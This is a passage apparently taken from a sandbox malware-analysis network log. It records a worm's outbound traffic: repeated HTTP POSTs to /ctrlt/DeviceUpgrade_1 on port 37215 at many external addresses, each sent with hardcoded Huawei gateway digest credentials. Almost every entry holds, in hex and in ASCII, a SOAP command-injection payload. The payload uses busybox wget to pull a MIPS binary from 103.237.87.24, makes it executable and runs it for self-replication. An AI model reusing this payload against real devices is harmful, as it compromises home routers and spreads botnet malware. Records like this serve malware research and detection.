69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  397192.168.2.1334228197.64.60.21337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.103692055 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  398192.168.2.134357641.143.41.5737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.103701115 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  399192.168.2.1335970197.150.119.3537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.103714943 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  400192.168.2.1352842157.207.118.17137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.104991913 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  401192.168.2.1333256197.112.156.18937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.105001926 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  402192.168.2.135296492.48.3.1137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.105015039 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  403192.168.2.1356532197.86.3.17237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.105022907 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  404192.168.2.134877478.121.82.23437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.108824015 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  405192.168.2.135243041.65.136.18437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.108829975 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  406192.168.2.1352596197.255.68.24537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.108901024 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  407192.168.2.1352344197.189.251.17037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.108907938 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
